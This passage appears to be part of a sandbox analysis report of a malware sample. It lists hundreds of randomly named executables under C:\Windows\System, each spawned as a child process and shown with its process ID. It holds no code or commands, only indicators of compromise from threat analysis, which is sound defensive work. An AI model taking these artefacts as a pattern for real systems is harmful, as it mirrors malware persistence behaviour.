  PID:8040
- C:\Windows\System\FWpxqna.exe
  C:\Windows\System\FWpxqna.exe
  2⤵
  PID:8116
- C:\Windows\System\aXrByhl.exe
  C:\Windows\System\aXrByhl.exe
  2⤵
  PID:8156
- C:\Windows\System\WlJbNlv.exe
  C:\Windows\System\WlJbNlv.exe
  2⤵
  PID:7236
- C:\Windows\System\IkIBHXL.exe
  C:\Windows\System\IkIBHXL.exe
  2⤵
  PID:7416
- C:\Windows\System\QISZveT.exe
  C:\Windows\System\QISZveT.exe
  2⤵
  PID:7480
- C:\Windows\System\oOMjIUX.exe
  C:\Windows\System\oOMjIUX.exe
  2⤵
  PID:7684
- C:\Windows\System\CzArvFD.exe
  C:\Windows\System\CzArvFD.exe
  2⤵
  PID:7808
- C:\Windows\System\yvkbZcu.exe
  C:\Windows\System\yvkbZcu.exe
  2⤵
  PID:7888
- C:\Windows\System\ZdOuVXZ.exe
  C:\Windows\System\ZdOuVXZ.exe
  2⤵
  PID:7988
- C:\Windows\System\VnHYPir.exe
  C:\Windows\System\VnHYPir.exe
  2⤵
  PID:7056
- C:\Windows\System\CxgQzJs.exe
  C:\Windows\System\CxgQzJs.exe
  2⤵
  PID:7340
- C:\Windows\System\dhRxPQz.exe
  C:\Windows\System\dhRxPQz.exe
  2⤵
  PID:7912
- C:\Windows\System\EpXrwIN.exe
  C:\Windows\System\EpXrwIN.exe
  2⤵
  PID:6524
- C:\Windows\System\hVCOtYQ.exe
  C:\Windows\System\hVCOtYQ.exe
  2⤵
  PID:8276
- C:\Windows\System\iOpwNVA.exe
  C:\Windows\System\iOpwNVA.exe
  2⤵
  PID:8292
- C:\Windows\System\MUFPTXb.exe
  C:\Windows\System\MUFPTXb.exe
  2⤵
  PID:8312
- C:\Windows\System\dVlBAHC.exe
  C:\Windows\System\dVlBAHC.exe
  2⤵
  PID:8360
- C:\Windows\System\ccVkQiC.exe
  C:\Windows\System\ccVkQiC.exe
  2⤵
  PID:8396
- C:\Windows\System\NJbYHjf.exe
  C:\Windows\System\NJbYHjf.exe
  2⤵
  PID:8416
- C:\Windows\System\wvrIiLD.exe
  C:\Windows\System\wvrIiLD.exe
  2⤵
  PID:8468
- C:\Windows\System\xhPluFc.exe
  C:\Windows\System\xhPluFc.exe
  2⤵
  PID:8492
- C:\Windows\System\qWwfEcQ.exe
  C:\Windows\System\qWwfEcQ.exe
  2⤵
  PID:8524
- C:\Windows\System\EKeUkkJ.exe
  C:\Windows\System\EKeUkkJ.exe
  2⤵
  PID:8548
- C:\Windows\System\tVHysPM.exe
  C:\Windows\System\tVHysPM.exe
  2⤵
  PID:8576
- C:\Windows\System\KYEMqmX.exe
  C:\Windows\System\KYEMqmX.exe
  2⤵
  PID:8596
- C:\Windows\System\FhHsmNc.exe
  C:\Windows\System\FhHsmNc.exe
  2⤵
  PID:8620
- C:\Windows\System\EWWyAqb.exe
  C:\Windows\System\EWWyAqb.exe
  2⤵
  PID:8656
- C:\Windows\System\HNpRsNX.exe
  C:\Windows\System\HNpRsNX.exe
  2⤵
  PID:8724
- C:\Windows\System\yhRyhMf.exe
  C:\Windows\System\yhRyhMf.exe
  2⤵
  PID:8744
- C:\Windows\System\OawTOok.exe
  C:\Windows\System\OawTOok.exe
  2⤵
  PID:8780
- C:\Windows\System\BxoRZXX.exe
  C:\Windows\System\BxoRZXX.exe
  2⤵
  PID:8800
- C:\Windows\System\DpZoqFs.exe
  C:\Windows\System\DpZoqFs.exe
  2⤵
  PID:8840
- C:\Windows\System\KmOBEEw.exe
  C:\Windows\System\KmOBEEw.exe
  2⤵
  PID:8864
- C:\Windows\System\GVeOzVU.exe
  C:\Windows\System\GVeOzVU.exe
  2⤵
  PID:8884
- C:\Windows\System\UWGrIlc.exe
  C:\Windows\System\UWGrIlc.exe
  2⤵
  PID:8900
- C:\Windows\System\dNBNIZc.exe
  C:\Windows\System\dNBNIZc.exe
  2⤵
  PID:8920
- C:\Windows\System\WdfCVKB.exe
  C:\Windows\System\WdfCVKB.exe
  2⤵
  PID:8940
- C:\Windows\System\evQsWqS.exe
  C:\Windows\System\evQsWqS.exe
  2⤵
  PID:8996
- C:\Windows\System\XPHsXmX.exe
  C:\Windows\System\XPHsXmX.exe
  2⤵
  PID:9016
- C:\Windows\System\IRLNKDD.exe
  C:\Windows\System\IRLNKDD.exe
  2⤵
  PID:9040
- C:\Windows\System\qeMPCjh.exe
  C:\Windows\System\qeMPCjh.exe
  2⤵
  PID:9064
- C:\Windows\System\dKQYljW.exe
  C:\Windows\System\dKQYljW.exe
  2⤵
  PID:9084
- C:\Windows\System\kZxgrCE.exe
  C:\Windows\System\kZxgrCE.exe
  2⤵
  PID:9104
- C:\Windows\System\yANMfcQ.exe
  C:\Windows\System\yANMfcQ.exe
  2⤵
  PID:9136
- C:\Windows\System\fsVcJhn.exe
  C:\Windows\System\fsVcJhn.exe
  2⤵
  PID:9192
- C:\Windows\System\wrFfNFb.exe
  C:\Windows\System\wrFfNFb.exe
  2⤵
  PID:7560
- C:\Windows\System\RfAEPvV.exe
  C:\Windows\System\RfAEPvV.exe
  2⤵
  PID:7596
- C:\Windows\System\ZYLkgDQ.exe
  C:\Windows\System\ZYLkgDQ.exe
  2⤵
  PID:8240
- C:\Windows\System\yWcwVYq.exe
  C:\Windows\System\yWcwVYq.exe
  2⤵
  PID:8328
- C:\Windows\System\HhVLDcp.exe
  C:\Windows\System\HhVLDcp.exe
  2⤵
  PID:8272
- C:\Windows\System\KAlpgXq.exe
  C:\Windows\System\KAlpgXq.exe
  2⤵
  PID:8348
- C:\Windows\System\AFQlBLm.exe
  C:\Windows\System\AFQlBLm.exe
  2⤵
  PID:8476
- C:\Windows\System\SalVOkR.exe
  C:\Windows\System\SalVOkR.exe
  2⤵
  PID:8512
- C:\Windows\System\EYQCCTy.exe
  C:\Windows\System\EYQCCTy.exe
  2⤵
  PID:8592
- C:\Windows\System\TMkvlFR.exe
  C:\Windows\System\TMkvlFR.exe
  2⤵
  PID:8612
- C:\Windows\System\sdObthO.exe
  C:\Windows\System\sdObthO.exe
  2⤵
  PID:8672
- C:\Windows\System\xWKYARb.exe
  C:\Windows\System\xWKYARb.exe
  2⤵
  PID:8732
- C:\Windows\System\aZQqtAR.exe
  C:\Windows\System\aZQqtAR.exe
  2⤵
  PID:8876
- C:\Windows\System\dAhgTAe.exe
  C:\Windows\System\dAhgTAe.exe
  2⤵
  PID:8908
- C:\Windows\System\IoGYvjy.exe
  C:\Windows\System\IoGYvjy.exe
  2⤵
  PID:8984
- C:\Windows\System\bHlKsjU.exe
  C:\Windows\System\bHlKsjU.exe
  2⤵
  PID:9072
- C:\Windows\System\RDgglad.exe
  C:\Windows\System\RDgglad.exe
  2⤵
  PID:9052
- C:\Windows\System\almZwKQ.exe
  C:\Windows\System\almZwKQ.exe
  2⤵
  PID:9116
- C:\Windows\System\UAirmue.exe
  C:\Windows\System\UAirmue.exe
  2⤵
  PID:9172
- C:\Windows\System\btSLkhL.exe
  C:\Windows\System\btSLkhL.exe
  2⤵
  PID:8308
- C:\Windows\System\xWddNhe.exe
  C:\Windows\System\xWddNhe.exe
  2⤵
  PID:8428
- C:\Windows\System\SPInlFh.exe
  C:\Windows\System\SPInlFh.exe
  2⤵
  PID:8520
- C:\Windows\System\qytlAOf.exe
  C:\Windows\System\qytlAOf.exe
  2⤵
  PID:8644
- C:\Windows\System\OIbSQNS.exe
  C:\Windows\System\OIbSQNS.exe
  2⤵
  PID:8760
- C:\Windows\System\kgLBcFj.exe
  C:\Windows\System\kgLBcFj.exe
  2⤵
  PID:8912
- C:\Windows\System\mKqokuY.exe
  C:\Windows\System\mKqokuY.exe
  2⤵
  PID:9184
- C:\Windows\System\fNugqwt.exe
  C:\Windows\System\fNugqwt.exe
  2⤵
  PID:8264
- C:\Windows\System\ILXFYbD.exe
  C:\Windows\System\ILXFYbD.exe
  2⤵
  PID:8484
- C:\Windows\System\YHSWJuC.exe
  C:\Windows\System\YHSWJuC.exe
  2⤵
  PID:9076
- C:\Windows\System\bTGBjfG.exe
  C:\Windows\System\bTGBjfG.exe
  2⤵
  PID:8160
- C:\Windows\System\JNKOBvN.exe
  C:\Windows\System\JNKOBvN.exe
  2⤵
  PID:9224
- C:\Windows\System\xXDzvDh.exe
  C:\Windows\System\xXDzvDh.exe
  2⤵
  PID:9244
- C:\Windows\System\oxzREyH.exe
  C:\Windows\System\oxzREyH.exe
  2⤵
  PID:9268
- C:\Windows\System\eZzryjV.exe
  C:\Windows\System\eZzryjV.exe
  2⤵
  PID:9296
- C:\Windows\System\RoTfikv.exe
  C:\Windows\System\RoTfikv.exe
  2⤵
  PID:9352
- C:\Windows\System\VtKdHTN.exe
  C:\Windows\System\VtKdHTN.exe
  2⤵
  PID:9380
- C:\Windows\System\rUpedMB.exe
  C:\Windows\System\rUpedMB.exe
  2⤵
  PID:9408
- C:\Windows\System\nxPgPaY.exe
  C:\Windows\System\nxPgPaY.exe
  2⤵
  PID:9436
- C:\Windows\System\hzavtkv.exe
  C:\Windows\System\hzavtkv.exe
  2⤵
  PID:9452
- C:\Windows\System\ekMHkgP.exe
  C:\Windows\System\ekMHkgP.exe
  2⤵
  PID:9476
- C:\Windows\System\Evenouq.exe
  C:\Windows\System\Evenouq.exe
  2⤵
  PID:9532
- C:\Windows\System\aiRPKjc.exe
  C:\Windows\System\aiRPKjc.exe
  2⤵
  PID:9552
- C:\Windows\System\SUvVnAL.exe
  C:\Windows\System\SUvVnAL.exe
  2⤵
  PID:9580
- C:\Windows\System\fLmmBLg.exe
  C:\Windows\System\fLmmBLg.exe
  2⤵
  PID:9608
- C:\Windows\System\hLRVnfN.exe
  C:\Windows\System\hLRVnfN.exe
  2⤵
  PID:9632
- C:\Windows\System\eyDvDaO.exe
  C:\Windows\System\eyDvDaO.exe
  2⤵
  PID:9652
- C:\Windows\System\mTLQjCg.exe
  C:\Windows\System\mTLQjCg.exe
  2⤵
  PID:9680
- C:\Windows\System\OPnQKAH.exe
  C:\Windows\System\OPnQKAH.exe
  2⤵
  PID:9724
- C:\Windows\System\kWpFanz.exe
  C:\Windows\System\kWpFanz.exe
  2⤵
  PID:9760
- C:\Windows\System\SbdRSem.exe
  C:\Windows\System\SbdRSem.exe
  2⤵
  PID:9784
- C:\Windows\System\GVfhOSf.exe
  C:\Windows\System\GVfhOSf.exe
  2⤵
  PID:9824
- C:\Windows\System\gIBggyj.exe
  C:\Windows\System\gIBggyj.exe
  2⤵
  PID:9848
- C:\Windows\System\rrVUFKl.exe
  C:\Windows\System\rrVUFKl.exe
  2⤵
  PID:9876
- C:\Windows\System\KnYFTpa.exe
  C:\Windows\System\KnYFTpa.exe
  2⤵
  PID:9900
- C:\Windows\System\wmjtHnm.exe
  C:\Windows\System\wmjtHnm.exe
  2⤵
  PID:9916
- C:\Windows\System\sibLfPO.exe
  C:\Windows\System\sibLfPO.exe
  2⤵
  PID:9944
- C:\Windows\System\inMjQjY.exe
  C:\Windows\System\inMjQjY.exe
  2⤵
  PID:9968
- C:\Windows\System\FHoQIhY.exe
  C:\Windows\System\FHoQIhY.exe
  2⤵
  PID:9988
- C:\Windows\System\PCzrFsR.exe
  C:\Windows\System\PCzrFsR.exe
  2⤵
  PID:10028
- C:\Windows\System\vFANIQf.exe
  C:\Windows\System\vFANIQf.exe
  2⤵
  PID:10056
- C:\Windows\System\MkGNIZj.exe
  C:\Windows\System\MkGNIZj.exe
  2⤵
  PID:10080
- C:\Windows\System\ZZryonn.exe
  C:\Windows\System\ZZryonn.exe
  2⤵
  PID:10100
- C:\Windows\System\NBNfplP.exe
  C:\Windows\System\NBNfplP.exe
  2⤵
  PID:10128
- C:\Windows\System\pJnWWMi.exe
  C:\Windows\System\pJnWWMi.exe
  2⤵
  PID:10152
- C:\Windows\System\GHtoPfa.exe
  C:\Windows\System\GHtoPfa.exe
  2⤵
  PID:10176
- C:\Windows\System\dAeTyFs.exe
  C:\Windows\System\dAeTyFs.exe
  2⤵
  PID:10200
- C:\Windows\System\JaBQXGm.exe
  C:\Windows\System\JaBQXGm.exe
  2⤵
  PID:10228
- C:\Windows\System\iNuEdDT.exe
  C:\Windows\System\iNuEdDT.exe
  2⤵
  PID:8488
- C:\Windows\System\UoTvHie.exe
  C:\Windows\System\UoTvHie.exe
  2⤵
  PID:8628
- C:\Windows\System\qErLWmS.exe
  C:\Windows\System\qErLWmS.exe
  2⤵
  PID:9304
- C:\Windows\System\SXbYxHI.exe
  C:\Windows\System\SXbYxHI.exe
  2⤵
  PID:9372
- C:\Windows\System\KDSbBVh.exe
  C:\Windows\System\KDSbBVh.exe
  2⤵
  PID:9464
- C:\Windows\System\akzaPYS.exe
  C:\Windows\System\akzaPYS.exe
  2⤵
  PID:9512
- C:\Windows\System\zRJJzOp.exe
  C:\Windows\System\zRJJzOp.exe
  2⤵
  PID:9516
- C:\Windows\System\fLkseLM.exe
  C:\Windows\System\fLkseLM.exe
  2⤵
  PID:9572
- C:\Windows\System\dKbonvs.exe
  C:\Windows\System\dKbonvs.exe
  2⤵
  PID:9624
- C:\Windows\System\tcynaUk.exe
  C:\Windows\System\tcynaUk.exe
  2⤵
  PID:9672
- C:\Windows\System\vxOkjiz.exe
  C:\Windows\System\vxOkjiz.exe
  2⤵
  PID:9864
- C:\Windows\System\ByYNudE.exe
  C:\Windows\System\ByYNudE.exe
  2⤵
  PID:9924
- C:\Windows\System\RBAxDro.exe
  C:\Windows\System\RBAxDro.exe
  2⤵
  PID:10000
- C:\Windows\System\VoUpYnI.exe
  C:\Windows\System\VoUpYnI.exe
  2⤵
  PID:10064
- C:\Windows\System\vxUZHlh.exe
  C:\Windows\System\vxUZHlh.exe
  2⤵
  PID:10160
- C:\Windows\System\KNlPSuH.exe
  C:\Windows\System\KNlPSuH.exe
  2⤵
  PID:10120
- C:\Windows\System\WmGWinQ.exe
  C:\Windows\System\WmGWinQ.exe
  2⤵
  PID:9032
- C:\Windows\System\MQPBlyG.exe
  C:\Windows\System\MQPBlyG.exe
  2⤵
  PID:8344
- C:\Windows\System\VbcHmVG.exe
  C:\Windows\System\VbcHmVG.exe
  2⤵
  PID:9448
- C:\Windows\System\KBfiwjP.exe
  C:\Windows\System\KBfiwjP.exe
  2⤵
  PID:9836
- C:\Windows\System\LDLjasU.exe
  C:\Windows\System\LDLjasU.exe
  2⤵
  PID:9908
- C:\Windows\System\pqDNTVz.exe
  C:\Windows\System\pqDNTVz.exe
  2⤵
  PID:10144
- C:\Windows\System\DDenxGk.exe
  C:\Windows\System\DDenxGk.exe
  2⤵
  PID:10236
- C:\Windows\System\LxDxTlS.exe
  C:\Windows\System\LxDxTlS.exe
  2⤵
  PID:9400
- C:\Windows\System\QyeuNJd.exe
  C:\Windows\System\QyeuNJd.exe
  2⤵
  PID:9884
- C:\Windows\System\bOAXoiI.exe
  C:\Windows\System\bOAXoiI.exe
  2⤵
  PID:9600
- C:\Windows\System\kAgKguW.exe
  C:\Windows\System\kAgKguW.exe
  2⤵
  PID:10260
- C:\Windows\System\zXOcmVo.exe
  C:\Windows\System\zXOcmVo.exe
  2⤵
  PID:10288
- C:\Windows\System\MTLBPiH.exe
  C:\Windows\System\MTLBPiH.exe
  2⤵
  PID:10308
- C:\Windows\System\NZKRCOH.exe
  C:\Windows\System\NZKRCOH.exe
  2⤵
  PID:10348
- C:\Windows\System\HcmbvwK.exe
  C:\Windows\System\HcmbvwK.exe
  2⤵
  PID:10368
- C:\Windows\System\QzdfWVV.exe
  C:\Windows\System\QzdfWVV.exe
  2⤵
  PID:10392
- C:\Windows\System\xxCKIcU.exe
  C:\Windows\System\xxCKIcU.exe
  2⤵
  PID:10416
- C:\Windows\System\FSxTkWN.exe
  C:\Windows\System\FSxTkWN.exe
  2⤵
  PID:10436
- C:\Windows\System\xEGsshj.exe
  C:\Windows\System\xEGsshj.exe
  2⤵
  PID:10460
- C:\Windows\System\QMCsHkU.exe
  C:\Windows\System\QMCsHkU.exe
  2⤵
  PID:10484
- C:\Windows\System\WrOwwEE.exe
  C:\Windows\System\WrOwwEE.exe
  2⤵
  PID:10504
- C:\Windows\System\SqSAXvN.exe
  C:\Windows\System\SqSAXvN.exe
  2⤵
  PID:10548
- C:\Windows\System\dENYwtA.exe
  C:\Windows\System\dENYwtA.exe
  2⤵
  PID:10600
- C:\Windows\System\OFOfuKo.exe
  C:\Windows\System\OFOfuKo.exe
  2⤵
  PID:10624
- C:\Windows\System\hoqaPfd.exe
  C:\Windows\System\hoqaPfd.exe
  2⤵
  PID:10660
- C:\Windows\System\IknlWJB.exe
  C:\Windows\System\IknlWJB.exe
  2⤵
  PID:10696
- C:\Windows\System\fADngXU.exe
  C:\Windows\System\fADngXU.exe
  2⤵
  PID:10712
- C:\Windows\System\qBoMZNC.exe
  C:\Windows\System\qBoMZNC.exe
  2⤵
  PID:10736
- C:\Windows\System\JYNxEhC.exe
  C:\Windows\System\JYNxEhC.exe
  2⤵
  PID:10756
- C:\Windows\System\qgdssNq.exe
  C:\Windows\System\qgdssNq.exe
  2⤵
  PID:10780
- C:\Windows\System\RvcqaDR.exe
  C:\Windows\System\RvcqaDR.exe
  2⤵
  PID:10800
- C:\Windows\System\sASebAR.exe
  C:\Windows\System\sASebAR.exe
  2⤵
  PID:10824
- C:\Windows\System\oiFlHja.exe
  C:\Windows\System\oiFlHja.exe
  2⤵
  PID:10872
- C:\Windows\System\LlVuDrj.exe
  C:\Windows\System\LlVuDrj.exe
  2⤵
  PID:10900
- C:\Windows\System\rPtnudN.exe
  C:\Windows\System\rPtnudN.exe
  2⤵
  PID:10924
- C:\Windows\System\MLHvpPl.exe
  C:\Windows\System\MLHvpPl.exe
  2⤵
  PID:10944
- C:\Windows\System\VqgjqFJ.exe
  C:\Windows\System\VqgjqFJ.exe
  2⤵
  PID:10992
- C:\Windows\System\wgNQlym.exe
  C:\Windows\System\wgNQlym.exe
  2⤵
  PID:11012
- C:\Windows\System\AkblQSF.exe
  C:\Windows\System\AkblQSF.exe
  2⤵
  PID:11036
- C:\Windows\System\pSXylVd.exe
  C:\Windows\System\pSXylVd.exe
  2⤵
  PID:11084
- C:\Windows\System\GwLdpXB.exe
  C:\Windows\System\GwLdpXB.exe
  2⤵
  PID:11104
- C:\Windows\System\dEdnjgm.exe
  C:\Windows\System\dEdnjgm.exe
  2⤵
  PID:11152
- C:\Windows\System\pvxHtok.exe
  C:\Windows\System\pvxHtok.exe
  2⤵
  PID:11172
- C:\Windows\System\Eiskdoh.exe
  C:\Windows\System\Eiskdoh.exe
  2⤵
  PID:11188
- C:\Windows\System\uhRisAP.exe
  C:\Windows\System\uhRisAP.exe
  2⤵
  PID:11212
- C:\Windows\System\ZAHMpsK.exe
  C:\Windows\System\ZAHMpsK.exe
  2⤵
  PID:11236
- C:\Windows\System\PRfEsJg.exe
  C:\Windows\System\PRfEsJg.exe
  2⤵
  PID:9952
- C:\Windows\System\YKzoDyd.exe
  C:\Windows\System\YKzoDyd.exe
  2⤵
  PID:10304
- C:\Windows\System\TraSMEM.exe
  C:\Windows\System\TraSMEM.exe
  2⤵
  PID:10316
- C:\Windows\System\fypLoMC.exe
  C:\Windows\System\fypLoMC.exe
  2⤵
  PID:10364
- C:\Windows\System\gywkqiF.exe
  C:\Windows\System\gywkqiF.exe
  2⤵
  PID:10432
- C:\Windows\System\NHFytWy.exe
  C:\Windows\System\NHFytWy.exe
  2⤵
  PID:10476
- C:\Windows\System\Crwcxbw.exe
  C:\Windows\System\Crwcxbw.exe
  2⤵
  PID:10616
- C:\Windows\System\FxQlAfC.exe
  C:\Windows\System\FxQlAfC.exe
  2⤵
  PID:10596
- C:\Windows\System\BXZVIZF.exe
  C:\Windows\System\BXZVIZF.exe
  2⤵
  PID:10684
- C:\Windows\System\YfacEVU.exe
  C:\Windows\System\YfacEVU.exe
  2⤵
  PID:10720
- C:\Windows\System\VzCeFRN.exe
  C:\Windows\System\VzCeFRN.exe
  2⤵
  PID:10888
- C:\Windows\System\ISgXtNY.exe
  C:\Windows\System\ISgXtNY.exe
  2⤵
  PID:10952
- C:\Windows\System\UdLkUdZ.exe
  C:\Windows\System\UdLkUdZ.exe
  2⤵
  PID:10984
- C:\Windows\System\bsLRXyO.exe
  C:\Windows\System\bsLRXyO.exe
  2⤵
  PID:11064
- C:\Windows\System\ONErkku.exe
  C:\Windows\System\ONErkku.exe
  2⤵
  PID:11096
- C:\Windows\System\HtrOiZX.exe
  C:\Windows\System\HtrOiZX.exe
  2⤵
  PID:11160
- C:\Windows\System\eHYUFiH.exe
  C:\Windows\System\eHYUFiH.exe
  2⤵
  PID:11164
- C:\Windows\System\wVwgESu.exe
  C:\Windows\System\wVwgESu.exe
  2⤵
  PID:11260
- C:\Windows\System\zjwPDiO.exe
  C:\Windows\System\zjwPDiO.exe
  2⤵
  PID:10560
- C:\Windows\System\GBJUKok.exe
  C:\Windows\System\GBJUKok.exe
  2⤵
  PID:10680
- C:\Windows\System\wKbbQxk.exe
  C:\Windows\System\wKbbQxk.exe
  2⤵
  PID:10748
- C:\Windows\System\nZoVUfI.exe
  C:\Windows\System\nZoVUfI.exe
  2⤵
  PID:11024
- C:\Windows\System\cQknVQs.exe
  C:\Windows\System\cQknVQs.exe
  2⤵
  PID:11144
- C:\Windows\System\blKDSLz.exe
  C:\Windows\System\blKDSLz.exe
  2⤵
  PID:9264
- C:\Windows\System\pvwrdRZ.exe
  C:\Windows\System\pvwrdRZ.exe
  2⤵
  PID:10496
- C:\Windows\System\rQdtKbt.exe
  C:\Windows\System\rQdtKbt.exe
  2⤵
  PID:11060
- C:\Windows\System\lyHFxar.exe
  C:\Windows\System\lyHFxar.exe
  2⤵
  PID:11208
- C:\Windows\System\IPfoonc.exe
  C:\Windows\System\IPfoonc.exe
  2⤵
  PID:10412
- C:\Windows\System\bUSbblk.exe
  C:\Windows\System\bUSbblk.exe
  2⤵
  PID:11304
- C:\Windows\System\BUgTyNj.exe
  C:\Windows\System\BUgTyNj.exe
  2⤵
  PID:11328
- C:\Windows\System\LSHUXSL.exe
  C:\Windows\System\LSHUXSL.exe
  2⤵
  PID:11356
- C:\Windows\System\KqjwzYz.exe
  C:\Windows\System\KqjwzYz.exe
  2⤵
  PID:11376
- C:\Windows\System\FTgAaAQ.exe
  C:\Windows\System\FTgAaAQ.exe
  2⤵
  PID:11408
- C:\Windows\System\PhTGrUe.exe
  C:\Windows\System\PhTGrUe.exe
  2⤵
  PID:11432
- C:\Windows\System\LCjoFVb.exe
  C:\Windows\System\LCjoFVb.exe
  2⤵
  PID:11452
- C:\Windows\System\TvlZPxU.exe
  C:\Windows\System\TvlZPxU.exe
  2⤵
  PID:11476
- C:\Windows\System\dNinbtE.exe
  C:\Windows\System\dNinbtE.exe
  2⤵
  PID:11508
- C:\Windows\System\cCQeoiQ.exe
  C:\Windows\System\cCQeoiQ.exe
  2⤵
  PID:11532
- C:\Windows\System\tcoeBsA.exe
  C:\Windows\System\tcoeBsA.exe
  2⤵
  PID:11568
- C:\Windows\System\BxILhKX.exe
  C:\Windows\System\BxILhKX.exe
  2⤵
  PID:11612
- C:\Windows\System\ymkXNhI.exe
  C:\Windows\System\ymkXNhI.exe
  2⤵
  PID:11628
- C:\Windows\System\RpiqDpU.exe
  C:\Windows\System\RpiqDpU.exe
  2⤵
  PID:11648
- C:\Windows\System\dQrDUle.exe
  C:\Windows\System\dQrDUle.exe
  2⤵
  PID:11664
- C:\Windows\System\izQlNxK.exe
  C:\Windows\System\izQlNxK.exe
  2⤵
  PID:11688
- C:\Windows\System\QmQSOZL.exe
  C:\Windows\System\QmQSOZL.exe
  2⤵
  PID:11724
- C:\Windows\System\KMymmrI.exe
  C:\Windows\System\KMymmrI.exe
  2⤵
  PID:11756
- C:\Windows\System\XIHxTqj.exe
  C:\Windows\System\XIHxTqj.exe
  2⤵
  PID:11788
- C:\Windows\System\KGSIKBp.exe
  C:\Windows\System\KGSIKBp.exe
  2⤵
  PID:11808
- C:\Windows\System\YaFFeQp.exe
  C:\Windows\System\YaFFeQp.exe
  2⤵
  PID:11828
- C:\Windows\System\hlNuhnZ.exe
  C:\Windows\System\hlNuhnZ.exe
  2⤵
  PID:11848
- C:\Windows\System\ZOQTquC.exe
  C:\Windows\System\ZOQTquC.exe
  2⤵
  PID:11892
- C:\Windows\System\fAyDjpt.exe
  C:\Windows\System\fAyDjpt.exe
  2⤵
  PID:11920
- C:\Windows\System\XJHMaKL.exe
  C:\Windows\System\XJHMaKL.exe
  2⤵
  PID:11940
- C:\Windows\System\xhhfZyf.exe
  C:\Windows\System\xhhfZyf.exe
  2⤵
  PID:11960
- C:\Windows\System\JJlrezV.exe
  C:\Windows\System\JJlrezV.exe
  2⤵
  PID:11984
- C:\Windows\System\nVRGdEt.exe
  C:\Windows\System\nVRGdEt.exe
  2⤵
  PID:12004
- C:\Windows\System\JZYQAGm.exe
  C:\Windows\System\JZYQAGm.exe
  2⤵
  PID:12124
- C:\Windows\System\qJmAOLL.exe
  C:\Windows\System\qJmAOLL.exe
  2⤵
  PID:12140
- C:\Windows\System\xgTixZn.exe
  C:\Windows\System\xgTixZn.exe
  2⤵
  PID:12156
- C:\Windows\System\ijUMkoL.exe
  C:\Windows\System\ijUMkoL.exe
  2⤵
  PID:12172
- C:\Windows\System\cQrTUCD.exe
  C:\Windows\System\cQrTUCD.exe
  2⤵
  PID:12188
- C:\Windows\System\SVdmppE.exe
  C:\Windows\System\SVdmppE.exe
  2⤵
  PID:12204
- C:\Windows\System\WnvPkkf.exe
  C:\Windows\System\WnvPkkf.exe
  2⤵
  PID:12220
- C:\Windows\System\lBHBpki.exe
  C:\Windows\System\lBHBpki.exe
  2⤵
  PID:12236
- C:\Windows\System\uvWvxQv.exe
  C:\Windows\System\uvWvxQv.exe
  2⤵
  PID:12252
- C:\Windows\System\yJFPxzv.exe
  C:\Windows\System\yJFPxzv.exe
  2⤵
  PID:12272
- C:\Windows\System\GXUVaYp.exe
  C:\Windows\System\GXUVaYp.exe
  2⤵
  PID:11424
- C:\Windows\System\SunOSAv.exe
  C:\Windows\System\SunOSAv.exe
  2⤵
  PID:11428
- C:\Windows\System\yXuiDyt.exe
  C:\Windows\System\yXuiDyt.exe
  2⤵
  PID:11500
- C:\Windows\System\qrMJIMJ.exe
  C:\Windows\System\qrMJIMJ.exe
  2⤵
  PID:11584
- C:\Windows\System\wRetGaU.exe
  C:\Windows\System\wRetGaU.exe
  2⤵
  PID:11624
- C:\Windows\System\dOotDuK.exe
  C:\Windows\System\dOotDuK.exe
  2⤵
  PID:11864
- C:\Windows\System\UBCGpys.exe
  C:\Windows\System\UBCGpys.exe
  2⤵
  PID:11956
- C:\Windows\System\RmDkkAj.exe
  C:\Windows\System\RmDkkAj.exe
  2⤵
  PID:12032
- C:\Windows\System\jkPCSkW.exe
  C:\Windows\System\jkPCSkW.exe
  2⤵
  PID:11996
- C:\Windows\System\GzpTVPP.exe
  C:\Windows\System\GzpTVPP.exe
  2⤵
  PID:12088
- C:\Windows\System\gbgryhe.exe
  C:\Windows\System\gbgryhe.exe
  2⤵
  PID:12060
- C:\Windows\System\fsddExM.exe
  C:\Windows\System\fsddExM.exe
  2⤵
  PID:12112
- C:\Windows\System\uYFWJit.exe
  C:\Windows\System\uYFWJit.exe
  2⤵
  PID:12180
- C:\Windows\System\VgraQDa.exe
  C:\Windows\System\VgraQDa.exe
  2⤵
  PID:12232
- C:\Windows\System\TBmUyBo.exe
  C:\Windows\System\TBmUyBo.exe
  2⤵
  PID:11272
- C:\Windows\System\ZoXQvvX.exe
  C:\Windows\System\ZoXQvvX.exe
  2⤵
  PID:11484
- C:\Windows\System\QcnujZz.exe
  C:\Windows\System\QcnujZz.exe
  2⤵
  PID:11620
- C:\Windows\System\yAbfxbc.exe
  C:\Windows\System\yAbfxbc.exe
  2⤵
  PID:11908
- C:\Windows\System\dMzqjup.exe
  C:\Windows\System\dMzqjup.exe
  2⤵
  PID:11936
- C:\Windows\System\odHNixE.exe
  C:\Windows\System\odHNixE.exe
  2⤵
  PID:5832
- C:\Windows\System\LQRTCpm.exe
  C:\Windows\System\LQRTCpm.exe
  2⤵
  PID:5816
- C:\Windows\System\OhCefUH.exe
  C:\Windows\System\OhCefUH.exe
  2⤵
  PID:12064
- C:\Windows\System\QhNxoGO.exe
  C:\Windows\System\QhNxoGO.exe
  2⤵
  PID:11316
- C:\Windows\System\tabVeZa.exe
  C:\Windows\System\tabVeZa.exe
  2⤵
  PID:11980
- C:\Windows\System\jPrxtJF.exe
  C:\Windows\System\jPrxtJF.exe
  2⤵
  PID:5848
- C:\Windows\System\MsChOFu.exe
  C:\Windows\System\MsChOFu.exe
  2⤵
  PID:11336
- C:\Windows\System\umgPqhg.exe
  C:\Windows\System\umgPqhg.exe
  2⤵
  PID:12132
- C:\Windows\System\NTEFWcB.exe
  C:\Windows\System\NTEFWcB.exe
  2⤵
  PID:11768
- C:\Windows\System\kHPmBvu.exe
  C:\Windows\System\kHPmBvu.exe
  2⤵
  PID:12292
- C:\Windows\System\tPWzXFf.exe
  C:\Windows\System\tPWzXFf.exe
  2⤵
  PID:12316
- C:\Windows\System\RkAvRiu.exe
  C:\Windows\System\RkAvRiu.exe
  2⤵
  PID:12356
- C:\Windows\System\MKdxBvI.exe
  C:\Windows\System\MKdxBvI.exe
  2⤵
  PID:12376
- C:\Windows\System\WUikpwT.exe
  C:\Windows\System\WUikpwT.exe
  2⤵
  PID:12408
- C:\Windows\System\jrdyshg.exe
  C:\Windows\System\jrdyshg.exe
  2⤵
  PID:12444
- C:\Windows\System\oKiDKhb.exe
  C:\Windows\System\oKiDKhb.exe
  2⤵
  PID:12464
- C:\Windows\System\NMpyEHB.exe
  C:\Windows\System\NMpyEHB.exe
  2⤵
  PID:12484
